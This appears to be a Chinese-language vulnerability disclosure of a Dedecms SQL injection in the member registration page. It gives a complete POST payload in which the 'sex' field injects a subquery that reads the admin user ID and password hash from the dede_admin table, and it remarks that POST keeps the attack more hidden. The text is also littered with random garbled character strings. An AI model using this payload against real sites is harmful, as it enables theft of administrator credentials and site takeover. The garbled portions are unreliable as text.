漏洞类型: SQL注射漏洞! M0 a8 s6 d4 J$ R" T# N/ w
简要描述:
( W/ K0 ?$ ?% P3 A 8 g9 Y: _1 {5 I; j& _; @5 ]( J `
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. j0 T& F% N. }0 g7 f5 r
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
1 ^$ @& [) c/ `: u4 u详细说明:跟这个漏洞
/ K3 @6 _/ G" d6 V3 ^
8 i" E. h9 X; N% H% u& p) QWooYun: Dedecms SQL注射导致审核机制绕过漏洞6 r8 x4 S/ W: o8 O/ v$ Q: x( p
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.0 J7 `2 T, o; S# _0 y* {
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
4 d) Q4 W% C+ |- G5 i5 m! l+ e4 c
* n9 X8 }& ~+ ]2 x: R# ewww.political-security.com/member/reg_new.php
6 V: t) _/ `. b3 d, U2 \: D4 R
2 T2 [1 z4 f3 u2 G. V: t) X; Y& sPOST
2 ]- k8 _- R- a0 j3 L* @
/ \& q. }- w% U0 b& idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
/ f, V' P# P% a0 b6 vuserid=c4rp3nt3r&uname=c4rp3nt3r
% h* t) a. w% ^' q&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
( G9 i& M4 `: n2 W; {6 n&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,5 c* V' L( b4 `5 q" I) y! _* \; T# [
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
! K2 n, c9 G. J4 z* S6 e0 |%00&vdcode=glos&agree= |